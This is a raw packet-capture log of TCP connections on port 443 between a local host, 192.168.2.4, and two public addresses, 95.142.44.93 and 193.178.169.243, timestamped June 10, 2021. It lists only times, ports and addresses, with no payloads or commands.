                                                                                                                                    Jun 10, 2021 20:30:51.226202965 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226239920 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226243019 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226283073 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226313114 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226322889 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226331949 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226360083 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226387024 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226397991 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226402998 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226435900 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226463079 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226478100 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226514101 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226516962 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226528883 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226555109 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226557016 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226593018 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226619959 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226629972 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226636887 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226675987 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226677895 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226721048 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226732016 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226764917 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226773024 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226810932 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226818085 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226851940 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226861000 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226893902 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309686899 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309695959 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309725046 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309726954 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309771061 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309776068 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309819937 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309854031 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309859037 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309869051 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309897900 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309911013 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309937954 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309943914 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309978008 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309986115 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310018063 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310033083 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310058117 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310062885 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310100079 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310106039 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310149908 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310151100 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310189962 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310194016 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310230017 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310233116 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310271025 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310275078 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310308933 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310314894 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310350895 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310353041 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310391903 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310405016 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310441971 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310444117 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310487032 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310520887 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310527086 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310542107 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310568094 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310571909 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310607910 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310627937 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310647964 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310682058 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310688972 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310724974 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310729027 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310743093 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310769081 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310777903 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310822010 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310822964 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310861111 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310889006 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310900927 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310915947 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310940981 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310942888 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310981035 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310997009 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311022997 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311054945 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311063051 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311078072 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311108112 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311113119 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311199903 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311216116 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311242104 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311271906 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311283112 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311288118 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311333895 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311333895 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311379910 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311381102 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311419010 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311431885 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311460018 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311460972 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311501980 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311502934 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311542034 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311547041 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311582088 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311602116 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311621904 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311623096 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311666012 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311670065 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311717033 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311717033 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311754942 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311769962 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311795950 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311830997 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311837912 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311840057 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311883926 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311959982 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312007904 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312009096 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312053919 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312055111 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312092066 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312096119 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312131882 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312134981 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312172890 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312179089 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312216043 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312247992 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312256098 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312271118 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312295914 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312310934 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312345028 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312345982 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312390089 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312391043 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312428951 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312433004 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312468052 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312468052 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312508106 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312508106 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312546015 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312551022 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312587023 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312589884 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312625885 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312628984 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312668085 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312675953 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312721014 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312728882 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395081997 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395090103 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395119905 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395163059 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395169020 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395209074 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395242929 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395272017 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395283937 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395294905 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395330906 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395338058 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395358086 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395373106 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395394087 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395395041 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395428896 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395428896 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395438910 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395466089 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395500898 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395529032 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395534992 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395540953 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395550013 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395570040 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395589113 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395605087 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395626068 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395648956 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395663977 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395689011 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395705938 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395723104 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395746946 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395757914 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395762920 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395792007 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395809889 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395826101 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395843983 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395860910 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395876884 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395895958 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395910025 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395939112 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.395950079 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.395977974 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396004915 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396013021 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396028996 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396049976 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396069050 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396085024 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396100998 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396120071 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396141052 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396156073 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396174908 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396189928 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396213055 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396233082 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396233082 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396270990 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396291971 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396306992 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396318913 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396342993 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396358013 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396378040 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396403074 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396414995 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396440983 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396445036 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.396481991 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.396514893 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:54.228312969 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.278389931 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.278568029 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.294236898 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.344196081 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.344501019 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.344542980 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.344583035 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.344609022 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.344623089 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.344675064 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.344687939 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.344695091 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.346164942 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.346271992 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.426048994 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.476439953 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.476583004 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.489464998 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.489721060 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.539603949 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.539714098 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.579809904 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.597079039 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.597209930 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.604614019 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:30:54.654475927 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.702992916 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:54.703145981 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:31:24.709906101 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:31:24.760031939 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:31:24.810326099 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:31:24.810436010 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:31:54.815361977 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:31:54.865492105 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:31:54.915523052 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:31:54.915642023 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:31:56.338686943 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:31:56.338705063 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:31:56.338746071 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:31:56.338783026 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:32:24.920525074 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:32:24.971000910 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:25.021260023 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:25.023032904 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:32:36.866995096 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:32:36.867017031 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:32:36.947144032 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:36.947261095 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:32:55.028158903 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:32:55.079272032 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:32:55.129355907 CEST44349739193.178.169.243192.168.2.4
